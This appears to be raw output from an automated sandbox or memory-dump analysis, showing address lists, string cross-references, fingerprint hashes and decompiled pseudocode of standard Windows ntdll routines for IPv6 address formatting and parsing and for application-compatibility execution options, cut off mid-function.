                                                                                                                                                    0x02508a42
                                                                                                                                                    0x02551bb0
                                                                                                                                                    0x02551b11
                                                                                                                                                    0x02551b11
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02508a48
                                                                                                                                                    0x02508a51
                                                                                                                                                    0x02508a5b
                                                                                                                                                    0x02508a5e
                                                                                                                                                    0x02508a61
                                                                                                                                                    0x02508a69
                                                                                                                                                    0x02508a69
                                                                                                                                                    0x02508a6d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02508a74
                                                                                                                                                    0x02508a7c
                                                                                                                                                    0x02508a7d
                                                                                                                                                    0x02508a91
                                                                                                                                                    0x02508a93
                                                                                                                                                    0x02508a93
                                                                                                                                                    0x02508a98
                                                                                                                                                    0x02508a9b
                                                                                                                                                    0x02508aa1
                                                                                                                                                    0x02508aa1
                                                                                                                                                    0x02508aa4
                                                                                                                                                    0x02508aaa
                                                                                                                                                    0x02508ab1
                                                                                                                                                    0x02508ac5
                                                                                                                                                    0x02508ac7
                                                                                                                                                    0x02508ac7
                                                                                                                                                    0x02508ac5
                                                                                                                                                    0x02508ace
                                                                                                                                                    0x02551bc9
                                                                                                                                                    0x02551bce
                                                                                                                                                    0x02551bd2
                                                                                                                                                    0x02551bd2
                                                                                                                                                    0x02508ad8
                                                                                                                                                    0x02508aeb
                                                                                                                                                    0x02508aeb
                                                                                                                                                    0x02508af0
                                                                                                                                                    0x02508af4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02508af4
                                                                                                                                                    0x02508a42
                                                                                                                                                    0x02508926
                                                                                                                                                    0x02508929
                                                                                                                                                    0x0250892c
                                                                                                                                                    0x0250892d
                                                                                                                                                    0x02508930
                                                                                                                                                    0x02508935
                                                                                                                                                    0x0250893a
                                                                                                                                                    0x02508b51
                                                                                                                                                    0x02508940
                                                                                                                                                    0x02508954
                                                                                                                                                    0x02508954
                                                                                                                                                    0x0250895a
                                                                                                                                                    0x02551b63
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02508960
                                                                                                                                                    0x02508969
                                                                                                                                                    0x02508973
                                                                                                                                                    0x02508976
                                                                                                                                                    0x02508979
                                                                                                                                                    0x0250897e
                                                                                                                                                    0x02508981
                                                                                                                                                    0x02508981
                                                                                                                                                    0x02508986
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02551b6e
                                                                                                                                                    0x02551b74
                                                                                                                                                    0x02551b7b
                                                                                                                                                    0x02551b8f
                                                                                                                                                    0x02551b91
                                                                                                                                                    0x02551b91
                                                                                                                                                    0x02551b99
                                                                                                                                                    0x02551b9c
                                                                                                                                                    0x02551ba2
                                                                                                                                                    0x02551ba2
                                                                                                                                                    0x0250898c
                                                                                                                                                    0x02508992
                                                                                                                                                    0x02508999
                                                                                                                                                    0x025089ad
                                                                                                                                                    0x02551ba8
                                                                                                                                                    0x02551ba8
                                                                                                                                                    0x025089ad
                                                                                                                                                    0x025089b6
                                                                                                                                                    0x025089c8
                                                                                                                                                    0x025089cd
                                                                                                                                                    0x025089d0
                                                                                                                                                    0x025089d0
                                                                                                                                                    0x025089d6
                                                                                                                                                    0x025089e8
                                                                                                                                                    0x025089e8
                                                                                                                                                    0x025089ed
                                                                                                                                                    0x00000000
                                                                                                                                                    0x025089ed
                                                                                                                                                    0x0250895a
                                                                                                                                                    0x0250883e
                                                                                                                                                    0x02508841
                                                                                                                                                    0x02508844
                                                                                                                                                    0x02508845
                                                                                                                                                    0x02508848
                                                                                                                                                    0x0250884d
                                                                                                                                                    0x02508852
                                                                                                                                                    0x02508b49
                                                                                                                                                    0x02508858
                                                                                                                                                    0x0250886c
                                                                                                                                                    0x0250886c
                                                                                                                                                    0x02508872
                                                                                                                                                    0x02551b0e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02508878
                                                                                                                                                    0x02508881
                                                                                                                                                    0x0250888b
                                                                                                                                                    0x0250888e
                                                                                                                                                    0x02508891
                                                                                                                                                    0x02508896
                                                                                                                                                    0x02508899
                                                                                                                                                    0x02508899
                                                                                                                                                    0x0250889e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02551b21
                                                                                                                                                    0x02551b27
                                                                                                                                                    0x02551b2e
                                                                                                                                                    0x02551b42
                                                                                                                                                    0x02551b44
                                                                                                                                                    0x02551b44
                                                                                                                                                    0x02551b4c
                                                                                                                                                    0x02551b4f
                                                                                                                                                    0x02551b55
                                                                                                                                                    0x02551b55
                                                                                                                                                    0x025088a4
                                                                                                                                                    0x025088aa
                                                                                                                                                    0x025088b1
                                                                                                                                                    0x025088c5
                                                                                                                                                    0x02551b5b
                                                                                                                                                    0x02551b5b
                                                                                                                                                    0x025088c5
                                                                                                                                                    0x025088ce
                                                                                                                                                    0x025088e0
                                                                                                                                                    0x025088e5
                                                                                                                                                    0x025088e8
                                                                                                                                                    0x025088e8
                                                                                                                                                    0x025088ee
                                                                                                                                                    0x02508900
                                                                                                                                                    0x02508900
                                                                                                                                                    0x02508905
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02508905

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    • Kernel-MUI-Language-Disallowed, xrefs: 02508914
                                                                                                                                                    • WindowsExcludedProcs, xrefs: 025087C1
                                                                                                                                                    • Kernel-MUI-Language-SKU, xrefs: 025089FC
                                                                                                                                                    • Kernel-MUI-Language-Allowed, xrefs: 02508827
                                                                                                                                                    • Kernel-MUI-Number-Allowed, xrefs: 025087E6
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2358341858.00000000024D0000.00000040.00000001.sdmp, Offset: 024C0000, based on PE: true
                                                                                                                                                    • Associated: 00000008.00000002.2358336152.00000000024C0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358434259.00000000025B0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358441192.00000000025C0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358447686.00000000025C4000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358453643.00000000025C7000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358501853.00000000025D0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358621738.0000000002630000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcspbrk
                                                                                                                                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                    • API String ID: 402402107-258546922
                                                                                                                                                    • Opcode ID: ac6a03b86071b45eeccb40435eb12831d494f44e63edb32841c35b870c05852c
                                                                                                                                                    • Instruction ID: ed77c9d7532c7e30324d18c6ec3cc6b58aa1f748d05cd6b0aaacb3c5aa26ea63
                                                                                                                                                    • Opcode Fuzzy Hash: ac6a03b86071b45eeccb40435eb12831d494f44e63edb32841c35b870c05852c
                                                                                                                                                    • Instruction Fuzzy Hash: 66F125B2D00619EFDF11EF95C984EEEBBB9BF08314F10446AE906A7251E7309A44CF64
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 38%
                                                                                                                                                    			E025213CB(intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                                    				char _v8;
                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                    				intOrPtr* _v16;
                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                    				char _v24;
                                                                                                                                                    				intOrPtr _t71;
                                                                                                                                                    				signed int _t78;
                                                                                                                                                    				signed int _t86;
                                                                                                                                                    				char _t90;
                                                                                                                                                    				signed int _t91;
                                                                                                                                                    				signed int _t96;
                                                                                                                                                    				intOrPtr _t108;
                                                                                                                                                    				signed int _t114;
                                                                                                                                                    				void* _t115;
                                                                                                                                                    				intOrPtr _t128;
                                                                                                                                                    				intOrPtr* _t129;
                                                                                                                                                    				void* _t130;
                                                                                                                                                    
                                                                                                                                                    				_t129 = _a4;
                                                                                                                                                    				_t128 = _a8;
                                                                                                                                                    				_t116 = 0;
                                                                                                                                                    				_t71 = _t128 + 0x5c;
                                                                                                                                                    				_v8 = 8;
                                                                                                                                                    				_v20 = _t71;
                                                                                                                                                    				if( *_t129 == 0) {
                                                                                                                                                    					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                                                                                                                                    						goto L5;
                                                                                                                                                    					} else {
                                                                                                                                                    						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                                                                                                                                    						if(_t96 != 0) {
                                                                                                                                                    							L38:
                                                                                                                                                    							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                                                                                                                                    								goto L5;
                                                                                                                                                    							} else {
                                                                                                                                                    								_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                    								_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                    								_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                    								_t86 = E02517707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                                                                                                                                    								L36:
                                                                                                                                                    								return _t128 + _t86 * 2;
                                                                                                                                                    							}
                                                                                                                                                    						}
                                                                                                                                                    						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                                                                                                                                    						if(_t114 == 0) {
                                                                                                                                                    							L33:
                                                                                                                                                    							_t115 = 0x24e2926;
                                                                                                                                                    							L35:
                                                                                                                                                    							_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                    							_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                    							_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                    							_push( *(_t129 + 0xc) & 0x000000ff);
                                                                                                                                                    							_t86 = E02517707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                                                                                                                                    							goto L36;
                                                                                                                                                    						}
                                                                                                                                                    						if(_t114 != 0xffff) {
                                                                                                                                                    							_t116 = 0;
                                                                                                                                                    							goto L38;
                                                                                                                                                    						}
                                                                                                                                                    						if(_t114 != 0) {
                                                                                                                                                    							_t115 = 0x24e9cac;
                                                                                                                                                    							goto L35;
                                                                                                                                                    						}
                                                                                                                                                    						goto L33;
                                                                                                                                                    					}
                                                                                                                                                    				} else {
                                                                                                                                                    					L5:
                                                                                                                                                    					_a8 = _t116;
                                                                                                                                                    					_a4 = _t116;
                                                                                                                                                    					_v12 = _t116;
                                                                                                                                                    					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                                                                                                                                    						if( *(_t129 + 0xa) == 0xfe5e) {
                                                                                                                                                    							_v8 = 6;
                                                                                                                                                    						}
                                                                                                                                                    					}
                                                                                                                                                    					_t90 = _v8;
                                                                                                                                                    					if(_t90 <= _t116) {
                                                                                                                                                    						L11:
                                                                                                                                                    						if(_a8 - _a4 <= 1) {
                                                                                                                                                    							_a8 = _t116;
                                                                                                                                                    							_a4 = _t116;
                                                                                                                                                    						}
                                                                                                                                                    						_t91 = 0;
                                                                                                                                                    						if(_v8 <= _t116) {
                                                                                                                                                    							L22:
                                                                                                                                                    							if(_v8 < 8) {
                                                                                                                                                    								_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                    								_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                    								_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                    								_t128 = _t128 + E02517707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                                                                                                                                    							}
                                                                                                                                                    							return _t128;
                                                                                                                                                    						} else {
                                                                                                                                                    							L14:
                                                                                                                                                    							if(_a4 > _t91 || _t91 >= _a8) {
                                                                                                                                                    								if(_t91 != _t116 && _t91 != _a8) {
                                                                                                                                                    									_push(":");
                                                                                                                                                    									_push(_t71 - _t128 >> 1);
                                                                                                                                                    									_push(_t128);
                                                                                                                                                    									_t128 = _t128 + E02517707() * 2;
                                                                                                                                                    									_t71 = _v20;
                                                                                                                                                    									_t130 = _t130 + 0xc;
                                                                                                                                                    								}
                                                                                                                                                    								_t78 = E02517707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                                                                                                                                    								_t130 = _t130 + 0x10;
                                                                                                                                                    							} else {
                                                                                                                                                    								_push(L"::");
                                                                                                                                                    								_push(_t71 - _t128 >> 1);
                                                                                                                                                    								_push(_t128);
                                                                                                                                                    								_t78 = E02517707();
                                                                                                                                                    								_t130 = _t130 + 0xc;
                                                                                                                                                    								_t91 = _a8 - 1;
                                                                                                                                                    							}
                                                                                                                                                    							_t91 = _t91 + 1;
                                                                                                                                                    							_t128 = _t128 + _t78 * 2;
                                                                                                                                                    							_t71 = _v20;
                                                                                                                                                    							if(_t91 >= _v8) {
                                                                                                                                                    								goto L22;
                                                                                                                                                    							}
                                                                                                                                                    							_t116 = 0;
                                                                                                                                                    							goto L14;
                                                                                                                                                    						}
                                                                                                                                                    					} else {
                                                                                                                                                    						_t108 = 1;
                                                                                                                                                    						_v16 = _t129;
                                                                                                                                                    						_v24 = _t90;
                                                                                                                                                    						do {
                                                                                                                                                    							if( *_v16 == _t116) {
                                                                                                                                                    								if(_t108 - _v12 > _a8 - _a4) {
                                                                                                                                                    									_a4 = _v12;
                                                                                                                                                    									_a8 = _t108;
                                                                                                                                                    								}
                                                                                                                                                    								_t116 = 0;
                                                                                                                                                    							} else {
                                                                                                                                                    								_v12 = _t108;
                                                                                                                                                    							}
                                                                                                                                                    							_v16 = _v16 + 2;
                                                                                                                                                    							_t108 = _t108 + 1;
                                                                                                                                                    							_t26 =  &_v24;
                                                                                                                                                    							 *_t26 = _v24 - 1;
                                                                                                                                                    						} while ( *_t26 != 0);
                                                                                                                                                    						goto L11;
                                                                                                                                                    					}
                                                                                                                                                    				}
                                                                                                                                                    			}
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0254e942
                                                                                                                                                    0x025213f4
                                                                                                                                                    0x025213f4
                                                                                                                                                    0x025213f9
                                                                                                                                                    0x025213fc
                                                                                                                                                    0x025213ff
                                                                                                                                                    0x02521406
                                                                                                                                                    0x0254e9cc
                                                                                                                                                    0x0254e9d2
                                                                                                                                                    0x0254e9d2
                                                                                                                                                    0x0254e9cc
                                                                                                                                                    0x0252140c
                                                                                                                                                    0x02521411
                                                                                                                                                    0x02521431
                                                                                                                                                    0x0252143a
                                                                                                                                                    0x0252143c
                                                                                                                                                    0x0252143f
                                                                                                                                                    0x0252143f
                                                                                                                                                    0x02521442
                                                                                                                                                    0x02521447
                                                                                                                                                    0x025214a8
                                                                                                                                                    0x025214ac
                                                                                                                                                    0x0254e9e2
                                                                                                                                                    0x0254e9e7
                                                                                                                                                    0x0254e9ec
                                                                                                                                                    0x0254ea05
                                                                                                                                                    0x0254ea05
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02521449
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02521449
                                                                                                                                                    0x0252144c
                                                                                                                                                    0x02521459
                                                                                                                                                    0x02521462
                                                                                                                                                    0x02521469
                                                                                                                                                    0x0252146a
                                                                                                                                                    0x02521470
                                                                                                                                                    0x02521473
                                                                                                                                                    0x02521476
                                                                                                                                                    0x02521476
                                                                                                                                                    0x02521490
                                                                                                                                                    0x02521495
                                                                                                                                                    0x0252138e
                                                                                                                                                    0x02521390
                                                                                                                                                    0x02521397
                                                                                                                                                    0x02521398
                                                                                                                                                    0x02521399
                                                                                                                                                    0x025213a1
                                                                                                                                                    0x025213a4
                                                                                                                                                    0x025213a4
                                                                                                                                                    0x02521498
                                                                                                                                                    0x0252149c
                                                                                                                                                    0x0252149f
                                                                                                                                                    0x025214a2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x025214a4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x025214a4
                                                                                                                                                    0x02521413
                                                                                                                                                    0x02521415
                                                                                                                                                    0x02521416
                                                                                                                                                    0x02521419
                                                                                                                                                    0x0252141c
                                                                                                                                                    0x02521422
                                                                                                                                                    0x025213b7
                                                                                                                                                    0x025213bc
                                                                                                                                                    0x025213bf
                                                                                                                                                    0x025213bf
                                                                                                                                                    0x025213c2
                                                                                                                                                    0x02521424
                                                                                                                                                    0x02521424
                                                                                                                                                    0x02521424
                                                                                                                                                    0x02521427
                                                                                                                                                    0x0252142b
                                                                                                                                                    0x0252142c
                                                                                                                                                    0x0252142c
                                                                                                                                                    0x0252142c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0252141c
                                                                                                                                                    0x02521411

Memory Dump Source
• Source File: 00000008.00000002.2358341858.00000000024D0000.00000040.00000001.sdmp, Offset: 024C0000, based on PE: true
• Associated: 00000008.00000002.2358336152.00000000024C0000.00000040.00000001.sdmp
• Associated: 00000008.00000002.2358434259.00000000025B0000.00000040.00000001.sdmp
• Associated: 00000008.00000002.2358441192.00000000025C0000.00000040.00000001.sdmp
• Associated: 00000008.00000002.2358447686.00000000025C4000.00000040.00000001.sdmp
• Associated: 00000008.00000002.2358453643.00000000025C7000.00000040.00000001.sdmp
• Associated: 00000008.00000002.2358501853.00000000025D0000.00000040.00000001.sdmp
• Associated: 00000008.00000002.2358621738.0000000002630000.00000040.00000001.sdmp

Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
• API String ID: 48624451-2108815105
• Opcode ID: c4913dce33686dea8b60a84d9f383ae1c35de27bbcf05da6fa08596bd9b57fc3
• Instruction ID: fc5db087bb3545e155797d8d74ad6a4ff126017e7d2ac478bdbd0a52e066d813
• Opcode Fuzzy Hash: c4913dce33686dea8b60a84d9f383ae1c35de27bbcf05da6fa08596bd9b57fc3
• Instruction Fuzzy Hash: A7612371D00A66AADF24CF59C8808BFBFB6FF96305B14C52EE49E465C1D730A644CBA4

Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 64%
                                                                                                                                                    			E02517EFD(void* __ecx, intOrPtr _a4) {
                                                                                                                                                    				signed int _v8;
                                                                                                                                                    				char _v540;
                                                                                                                                                    				unsigned int _v544;
                                                                                                                                                    				signed int _v548;
                                                                                                                                                    				intOrPtr _v552;
                                                                                                                                                    				char _v556;
                                                                                                                                                    				void* __ebx;
                                                                                                                                                    				void* __edi;
                                                                                                                                                    				void* __esi;
                                                                                                                                                    				signed int _t33;
                                                                                                                                                    				void* _t38;
                                                                                                                                                    				unsigned int _t46;
                                                                                                                                                    				unsigned int _t47;
                                                                                                                                                    				unsigned int _t52;
                                                                                                                                                    				intOrPtr _t56;
                                                                                                                                                    				unsigned int _t62;
                                                                                                                                                    				void* _t69;
                                                                                                                                                    				void* _t70;
                                                                                                                                                    				intOrPtr _t72;
                                                                                                                                                    				signed int _t73;
                                                                                                                                                    				void* _t74;
                                                                                                                                                    				void* _t75;
                                                                                                                                                    				void* _t76;
                                                                                                                                                    				void* _t77;
                                                                                                                                                    
                                                                                                                                                    				_t33 =  *0x25c2088; // 0x767370ef
                                                                                                                                                    				_v8 = _t33 ^ _t73;
                                                                                                                                                    				_v548 = _v548 & 0x00000000;
                                                                                                                                                    				_t72 = _a4;
                                                                                                                                                    				if(E02517F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
                                                                                                                                                    					__eflags = _v548;
                                                                                                                                                    					if(_v548 == 0) {
                                                                                                                                                    						goto L1;
                                                                                                                                                    					}
                                                                                                                                                    					_t62 = _t72 + 0x24;
                                                                                                                                                    					E02533F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
                                                                                                                                                    					_t71 = 0x214;
                                                                                                                                                    					_v544 = 0x214;
                                                                                                                                                    					E024EDFC0( &_v540, 0, 0x214);
                                                                                                                                                    					_t75 = _t74 + 0x20;
                                                                                                                                                    					_t46 =  *0x25c4218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
                                                                                                                                                    					__eflags = _t46;
                                                                                                                                                    					if(_t46 == 0) {
                                                                                                                                                    						goto L1;
                                                                                                                                                    					}
                                                                                                                                                    					_t47 = _v544;
                                                                                                                                                    					__eflags = _t47;
                                                                                                                                                    					if(_t47 == 0) {
                                                                                                                                                    						goto L1;
                                                                                                                                                    					}
                                                                                                                                                    					__eflags = _t47 - 0x214;
                                                                                                                                                    					if(_t47 >= 0x214) {
                                                                                                                                                    						goto L1;
                                                                                                                                                    					}
                                                                                                                                                    					_push(_t62);
                                                                                                                                                    					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
                                                                                                                                                    					E02533F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
                                                                                                                                                    					_t52 = E024F0D27( &_v540, L"Execute=1");
                                                                                                                                                    					_t76 = _t75 + 0x1c;
                                                                                                                                                    					_push(_t62);
                                                                                                                                                    					__eflags = _t52;
                                                                                                                                                    					if(_t52 == 0) {
                                                                                                                                                    						E02533F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
                                                                                                                                                    						_t71 =  &_v540;
                                                                                                                                                    						_t56 = _t73 + _v544 - 0x218;
                                                                                                                                                    						_t77 = _t76 + 0x14;
                                                                                                                                                    						_v552 = _t56;
                                                                                                                                                    						__eflags = _t71 - _t56;
                                                                                                                                                    						if(_t71 >= _t56) {
                                                                                                                                                    							goto L1;
                                                                                                                                                    						} else {
                                                                                                                                                    							goto L10;
                                                                                                                                                    						}
                                                                                                                                                    						while(1) {
                                                                                                                                                    							L10:
                                                                                                                                                    							_t62 = E024F8375(_t71, 0x20);
                                                                                                                                                    							_pop(_t69);
                                                                                                                                                    							__eflags = _t62;
                                                                                                                                                    							if(__eflags != 0) {
                                                                                                                                                    								__eflags = 0;
                                                                                                                                                    								 *_t62 = 0;
                                                                                                                                                    							}
                                                                                                                                                    							E02533F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
                                                                                                                                                    							_t77 = _t77 + 0x10;
                                                                                                                                                    							E0255E8DB(_t69, _t70, __eflags, _t72, _t71);
                                                                                                                                                    							__eflags = _t62;
                                                                                                                                                    							if(_t62 == 0) {
                                                                                                                                                    								goto L1;
                                                                                                                                                    							}
                                                                                                                                                    							_t31 = _t62 + 2; // 0x2
                                                                                                                                                    							_t71 = _t31;
                                                                                                                                                    							__eflags = _t71 - _v552;
                                                                                                                                                    							if(_t71 >= _v552) {
                                                                                                                                                    								goto L1;
                                                                                                                                                    							}
                                                                                                                                                    						}
                                                                                                                                                    					}
                                                                                                                                                    					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                                                                                                                                    					_push(3);
                                                                                                                                                    					_push(0x55);
                                                                                                                                                    					E02533F92();
                                                                                                                                                    					_t38 = 1;
                                                                                                                                                    					L2:
                                                                                                                                                    					return E024EE1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
                                                                                                                                                    				}
                                                                                                                                                    				L1:
                                                                                                                                                    				_t38 = 0;
                                                                                                                                                    				goto L2;
                                                                                                                                                    			}




























                                                                                                                                                    APIs
                                                                                                                                                    • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 02533F12
                                                                                                                                                    Strings
                                                                                                                                                    • Execute=1, xrefs: 02533F5E
                                                                                                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02533F75
                                                                                                                                                    • ExecuteOptions, xrefs: 02533F04
                                                                                                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02533EC4
                                                                                                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02533F4A
                                                                                                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 0253E345
                                                                                                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0253E2FB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2358341858.00000000024D0000.00000040.00000001.sdmp, Offset: 024C0000, based on PE: true
• Associated: 00000008.00000002.2358336152.00000000024C0000.00000040.00000001.sdmp
• Associated: 00000008.00000002.2358434259.00000000025B0000.00000040.00000001.sdmp
• Associated: 00000008.00000002.2358441192.00000000025C0000.00000040.00000001.sdmp
• Associated: 00000008.00000002.2358447686.00000000025C4000.00000040.00000001.sdmp
• Associated: 00000008.00000002.2358453643.00000000025C7000.00000040.00000001.sdmp
• Associated: 00000008.00000002.2358501853.00000000025D0000.00000040.00000001.sdmp
• Associated: 00000008.00000002.2358621738.0000000002630000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: BaseDataModuleQuery
                                                                                                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                    • API String ID: 3901378454-484625025
                                                                                                                                                    • Opcode ID: 5edafa8acd0eabc46e1740c54f0675fbeedf8426e53b24df71f8ad363b620788
                                                                                                                                                    • Instruction ID: 654cc9ebc3547671ad85256474c1eae2d9acbc62c6fbfcf67f923bbd2877ee5e
                                                                                                                                                    • Opcode Fuzzy Hash: 5edafa8acd0eabc46e1740c54f0675fbeedf8426e53b24df71f8ad363b620788
                                                                                                                                                    • Instruction Fuzzy Hash: 7541D83168061D7AFF21DA94DC85FEBB3BDBF58705F0005AAA506E6080E770DA45CFA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E02520B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
                                                                                                                                                    				signed int _v8;
                                                                                                                                                    				signed int _v12;
                                                                                                                                                    				signed int _v16;
                                                                                                                                                    				signed int _v20;
                                                                                                                                                    				signed int _v24;
                                                                                                                                                    				signed int _v28;
                                                                                                                                                    				signed int _v32;
                                                                                                                                                    				void* _t108;
                                                                                                                                                    				void* _t116;
                                                                                                                                                    				char _t120;
                                                                                                                                                    				short _t121;
                                                                                                                                                    				void* _t128;
                                                                                                                                                    				intOrPtr* _t130;
                                                                                                                                                    				char _t132;
                                                                                                                                                    				short _t133;
                                                                                                                                                    				intOrPtr _t141;
                                                                                                                                                    				signed int _t156;
                                                                                                                                                    				signed int _t174;
                                                                                                                                                    				intOrPtr _t177;
                                                                                                                                                    				intOrPtr* _t179;
                                                                                                                                                    				intOrPtr _t180;
                                                                                                                                                    				void* _t183;
                                                                                                                                                    
                                                                                                                                                    				_t179 = _a4;
                                                                                                                                                    				_t141 =  *_t179;
                                                                                                                                                    				_v16 = 0;
                                                                                                                                                    				_v28 = 0;
                                                                                                                                                    				_v8 = 0;
                                                                                                                                                    				_v24 = 0;
                                                                                                                                                    				_v12 = 0;
                                                                                                                                                    				_v32 = 0;
                                                                                                                                                    				_v20 = 0;
                                                                                                                                                    				if(_t141 == 0) {
                                                                                                                                                    					L41:
                                                                                                                                                    					 *_a8 = _t179;
                                                                                                                                                    					_t180 = _v24;
                                                                                                                                                    					if(_t180 != 0) {
                                                                                                                                                    						if(_t180 != 3) {
                                                                                                                                                    							goto L6;
                                                                                                                                                    						}
                                                                                                                                                    						_v8 = _v8 + 1;
                                                                                                                                                    					}
                                                                                                                                                    					_t174 = _v32;
                                                                                                                                                    					if(_t174 == 0) {
                                                                                                                                                    						if(_v8 == 7) {
                                                                                                                                                    							goto L43;
                                                                                                                                                    						}
                                                                                                                                                    						goto L6;
                                                                                                                                                    					}
                                                                                                                                                    					L43:
                                                                                                                                                    					if(_v16 != 1) {
                                                                                                                                                    						if(_v16 != 2) {
                                                                                                                                                    							goto L6;
                                                                                                                                                    						}
                                                                                                                                                    						 *((short*)(_a12 + _v20 * 2)) = 0;
                                                                                                                                                    						L47:
                                                                                                                                                    						if(_t174 != 0) {
                                                                                                                                                    							E024F8980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
                                                                                                                                                    							_t116 = 8;
                                                                                                                                                    							E024EDFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
                                                                                                                                                    						}
                                                                                                                                                    						return 0;
                                                                                                                                                    					}
                                                                                                                                                    					if(_t180 != 0) {
                                                                                                                                                    						if(_v12 > 3) {
                                                                                                                                                    							goto L6;
                                                                                                                                                    						}
                                                                                                                                                    						_t120 = E02520CFA(_v28, 0, 0xa);
                                                                                                                                                    						_t183 = _t183 + 0xc;
                                                                                                                                                    						if(_t120 > 0xff) {
                                                                                                                                                    							goto L6;
                                                                                                                                                    						}
                                                                                                                                                    						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
                                                                                                                                                    						goto L47;
                                                                                                                                                    					}
                                                                                                                                                    					if(_v12 > 4) {
